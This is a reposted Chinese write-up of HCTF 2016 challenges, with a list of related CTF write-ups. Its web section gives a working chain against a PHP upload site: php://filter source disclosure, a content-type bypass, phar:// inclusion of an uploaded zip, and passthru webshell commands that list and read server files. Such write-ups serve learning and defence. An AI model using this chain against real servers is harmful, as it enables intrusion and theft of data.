2016hctf writeup

原創 szuaurora 2020-07-08 06:53

MISC杂项签到

http://139.224.54.27/webco1a/+_+.pcapng

用wireshark打开流量包,追踪TCP流,发现是一个webshell的流量,看到webshell控制端查看了远程服务器上的两个关键文件:function.py和flag

cat function.py:

#!/usr/bin/env python

# coding:utf-8

__author__ = 'Aklis'

 

from Crypto import Random

fromCrypto.Cipher import AES

 

import sys

import base64

 

 

def decrypt(encrypted, passphrase):

  IV = encrypted[:16]

aes = AES.new(passphrase, AES.MODE_CBC, IV)

returnaes.decrypt(encrypted[16:])

 

 

def encrypt(message, passphrase):

  IV = message[:16]

length = 16

count = len(message)

padding = length - (count % length)

message = message + '\0' * padding

aes = AES.new(passphrase, AES.MODE_CBC, IV)

returnaes.encrypt(message)

 

 

IV = 'YUFHJKVWEASDGQDH'

 

message = IV + 'flag is hctf{xxxxxxxxxxxxxxx}'

 

 

printlen(message)

 

example = encrypt(message, 'Qq4wdrhhyEWe4qBF')

print example

example = decrypt(example, 'Qq4wdrhhyEWe4qBF')

print example


 

cat flag:

mbZoEMrhAO0WWeugNjqNw3U6Tt2C+rwpgpbdWRZgfQI3MAh0sZ9qjnziUKkV90XhAOkIs/OXoYVw5uQDjVvgNA==

flag明显是个base64编码后的字符串,将其解码后再用function.py和decrypt函数解密:

运行得到flag

 

Web2099年的flag

由ios99想到改user-agent,抓包改一下

 

WebRESTFUL

先用PUT方法传个参

查了一下RESTful,发现是一种web软件架构,是一种分层结构

http://www.ruanyifeng.com/blog/2011/09/restful

改个包,flag出来了

 

MISC gogogo

下载下来,发现是个.nes的红白机文件,用FcEuX打开,看到了经典的魂斗罗

按照http://wenku.baidu.com/link?url=1i4slMmKov6LncwLAwa-VmJmAwRwIkgcK-xzls2uOnuJzS7wrsG_mjDdVOVbQzG0Q5p6NmRzcd-vBIbpuWihXEdoiQWs6dsc03aggjzd3Ty

的来修改一下有无限命和不坏金身,打穿就看到了:

 

Web 兵者多诡

http://pics.hctf.io/home.php?key=hduisa123

文件上传页面猜测是上传漏洞,页面说明只能上传png文件

尝试了几次后发现验证方式是对content-type验证,为image/png即可,但是上传后的文件会被重新命名并加上.png后缀。

发现允许使用php伪协议:

http://pics.hctf.io/home.php?fp=php://filter/convert.base64-encode/resource=upload

http://pics.hctf.io/home.php?fp=php://filter/convert.base64-encode/resource=home

http://pics.hctf.io/home.php?fp=php://filter/convert.base64-encode/resource=function

http://pics.hctf.io/home.php?fp=php://filter/convert.base64-encode/resource=show

把源码扒下来,base64解码,

home.php

<?php

error_reporting(0);

 

@session_start();

posix_setuid(1000);

 

$fp = empty($_GET['fp']) ? 'fail' : $_GET['fp'];

if(preg_match('/\.\./',$fp))

{

     die('No No No!');

}

if(preg_match('/rm/i',$_SERVER["QUERY_STRING"]))

{

     die();

}

?>

<!DOCTYPE html>

<html>

     <head>

              <title></title>

              <metacharset="utf-8">

              <linkhref="css/bootstrap.min.css" rel="stylesheet">

              <linkhref="css/jumbotron-narrow.css" rel="stylesheet">

     </head>

     <body>

              <divclass="container">

                       <divclass="header clearfix">

                                 <nav>

                                          <ulclass="navnav-pills pull-right">

                                                   <lirole="presentation" class="active"><ahref="home.php?key=hduisa123">Home</a></li>

                                          </ul>

                                 </nav>

                                 <h3class="text-muted">pictures</h3>

                       </div>

 

                       <divclass="jumbotron">

                                 <h1>PicturesStorage</h1>

                                 <pclass="lead">在这里上传您的图片,我们将为您保存</p>

                                 <formaction="?fp=upload" method="POST" id="form"enctype="multipart/form-data">

                                          <inputtype="file" id="image" name="image"class="btnbtn-lgbtn-success" style="margin-left: auto;margin-right: auto;">

                                          <br>

                                          <inputtype="submit" id="submit" name="submit"class="btnbtn-lgbtn-success" role="button" value="上传图片">

                                 </form>

                       </div>

              </div>

     </body>

</html>

<?php

if($fp !== 'fail')

{

     if(!(include($fp.'.php')))

     {

              ?>

              <divclass="alert alert-danger" role="alert">没有此页面</div>

              <?php

                       exit;

     }

}

?>

 

upload.php

<?php

include 'function.php';

if(isset($_POST['submit']) &&!empty($_FILES['image']['tmp_name']))

{  

     $name =$_FILES['image']['tmp_name'];

     $type =$_FILES['image']['type'];

     $size =$_FILES['image']['size'];

 

     if(!is_uploaded_file($name))

     {

              ?>

              <divclass="alert alert-danger" role="alert">图片上传失败,请重新上传</div>

              <?php

                       exit;

     }       

 

     if($type !== 'image/png')

     {

              ?>

              <divclass="alert alert-danger" role="alert">只能上传PNG图片</div>

              <?php

                       exit;

     }      

 

     if($size > 10240)

     {

              ?>

              <div class="alert alert-danger"role="alert">图片大小超过10KB</div>

              <?php

                       exit;

     }

 

     $imagekey =create_imagekey();

     move_uploaded_file($name,"uploads/$imagekey.png");

 

     echo"<script>location.href='?fp=show&imagekey=$imagekey'</script>";

}

?>

 

show.php

<?php

$imagekey = $_GET['imagekey'];

if(empty($imagekey))

{

     echo"<script>location.href='home.php'</script>";

     exit;

}

 

?>

<div class="alert alert-success"role="alert">

     上传成功,<ahref="uploads/<?php echo $imagekey; ?>.png"class="alert-link">点此查看</a>

</div>

 

 

function.php

<?php

     functioncreate_imagekey()

     {

              returnsha1($_SERVER['REMOTE_ADDR'] . $_SERVER['HTTP_USER_AGENT'] . time() .mt_rand());

     }

?>
 

发现home.php中存在本地文件包含:if(!(include($fp.’.php’))),fp参数可控制,然后会在文件名后加一个.php进行文件包含,因此我们可以上传我们需要包含的文件。但是直接包含肯定是不行的,需要构造文件名。

查询PHP手册发现PHP支持如下的Wrappers:

 

    file:// — Accessing localfilesystem

    http:// — AccessingHTTP(s) URLs

ftp:// — Accessing FTP(s) URLs

php:// — Accessing various I/O streams

zlib:// — Compression Streams

data:// — Data (RFC 2397)

glob:// — Find pathnames matching pattern

phar:// — PHP Archive

    ssh2:// — Secure Shell 2

rar:// — RAR

ogg:// — Audio streams

expect:// — Process Interaction Streams

测试phar://可用,将php文件打包在zip文件中,再构造路径访问。

测试发现如果webshell中有提交参数的变量会被过滤,如$_POST,$_REQUEST等,而且eval函数被禁用了,因此使用passthru函数执行系统命令。

写一个2.php文件,打包在zip压缩包中上传,上传时使用burpsuite的截断功能修改content-type。

查看当前目录下文件:<?phppassthru(‘ls–alh’); ?>

上传后访问文件名为24c38706822f22274de3d8faabb5b9601d922d85.png,访问

http://pics.hctf.io/home.php?fp=phar://uploads/24c38706822f22274de3d8faabb5b9601d922d85.png/2

没什么特别的

查看工作目录<?phppassthru(‘pwd’);?>

查看上层目录

<?php echo passthru('ls /var/www');?>


有个php文件,查看一下

<?php echo passthru('cat /var/www/Th1s_1s_F1a9.php');?>

查看页面源代码


發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

2017zctf misc300

下載題目後是個zip壓縮包,帶有密碼,本質是zip僞加密,解決方法可以是用壓縮包自帶的修復功能,或者用二進制打開工具修改zip文件頭,或者直接在linux下用binwalk –e 直接解壓 成功解壓後是幾個不熟悉的文件格式,還是用binw

szuaurora 2020-07-08 06:53:53

bugku CTF-练习平台 部分writeup

MISC 1.俄羅斯套娃 下載下來一個壓縮包 題目是bc957e26ff41470c556ee5d09e96880b 好像是MD5解出來是misc。。。雜項題 包裏三個文件 試了試常規找不到密碼,就試試僞加密 解壓出來了。

qq_26317875 2020-06-30 02:56:41

记一次明文攻击+盲水印 ctf题目

題目鏈接 http://pan.baidu.com/s/1slDhhvf 密碼:vroj解壓出來是這樣的warmup裏是這樣的:看着像兩個一樣的open_forun.png 想到明文攻擊,將open_forum.png壓縮,然後使用ARC

qq_26317875 2020-06-30 02:56:41

实验吧_小猴子爱吃桃

可以說是上編程課一個很一般的問題:python求出第一天的桃子數。n = 1 for i in range(9): n = (n+1)*2 th = 9-i print ("第%d天早上剩餘的桃子有:%4d個"%(th,n)) pr

Spwpun 2020-06-29 11:52:52

xctf-simple-check-100

水題一枚 這道題有點坑,給了三個平臺的程序文件,可惜win上面的是錯的。考察的也僅僅只是一個邏輯修改,不過爲了能從這道題學點東西,我把靜態情況下分析的結果利用py寫了個腳本來跑flag,算是對IDA中的算法逆向有了更深一步的理解吧

Spwpun 2020-06-29 11:52:45

JACTF 解题思路

##請大家不要看着writeup做題## 1、web  第一題:web簽到 直接審查頁面元素,發現提示: <!DOCTYPE html> <html> <head> <title>簽到</title> <meta charset=

valecalida 2020-06-23 08:53:12

【持续更新】BugKu ——WriteUp(一)

【持續更新】BugKu ——WriteUp(一) BugKu ——WEB [0] 工具: ①hackbar:web滲透的經典工具。 使用說明: WEB 1、web2 題目地址 聽說聰明的人都能找到答案 鏈接一打開,滿屏幕的

窝窝头_嘿嘿 2020-06-23 04:49:11

vulhub - Kioptrix: Level 1.1 (#2) writeup

主機來源:www.vulnhub.com 下載地址:https://download.vulnhub.com/kioptrix/Kioptrix_Level_2-update.rar 發現IP 安裝成功後,查找此虛擬機的IP,我使用的

一支神经病 2020-06-23 02:39:29

bugku杂项几题writeup

01: 解壓得到key.exe文件,拖到hex裏發現一串很長的base64編碼,根據題目提示,會得到一個二維碼圖片,想到base64轉圖片,這裏可以寫個html文件,也可以在線轉換,推薦HTML吧,剛好練習一下HTML。最後掃描二維碼得

Daniel-0 2020-06-21 02:47:45

实验吧web几题writeup

01: 打開鏈接做題,發現是一串js,按下F12,打開控制檯,複製所有的編碼到控制檯,回車即可拿到flag。 02: 打開題目鏈接做題。 題目說:make sure you are in hongkong ,這題應該要用到bur

Daniel-0 2020-06-20 20:47:42

攻防世界reverse新手区writeup

第一題 re1.exe   0x01.運行程序   可以看到需要輸入正確的flag   那麼現在,我們需要判斷程序是多少位的,有沒有加殼   0x02.exeinfope查詳細信息   可以看到程序是32位的,是Microsoft Vis

a370793934 2020-06-16 16:34:14

Bugku CTF Web(17-20) Writeup

#Bugku CTF Web(17-20) Writeup ##0x17flag在index裏 打開頁面有一個鏈接,點擊鏈接發現URL改變, 則可能會有文件包含漏洞。 利用php://filter僞協議,php://filte

KRDecad3 2020-06-11 11:50:39

WeChall-writeup-6-11.24(Limited Access Too;Shadowlamb - Chapter I)

突然發現之前的沒發,今天來補一下~ 這一次積分結算前做了兩道比較麻煩的題~會寫的比較詳細! Limited Access Too 這次用burpsuite來解~     具體的安裝和使用可以參考一下兩個鏈接:     1.安裝j

MeliodasC 2020-06-08 16:17:05

so beautiful so white&最低位的亲吻&无处不在的广告 writeup

cheese0_0 2020-06-03 14:28:06

打不开的文件(实验吧) writeup

cheese0_0 2020-06-03 14:28:06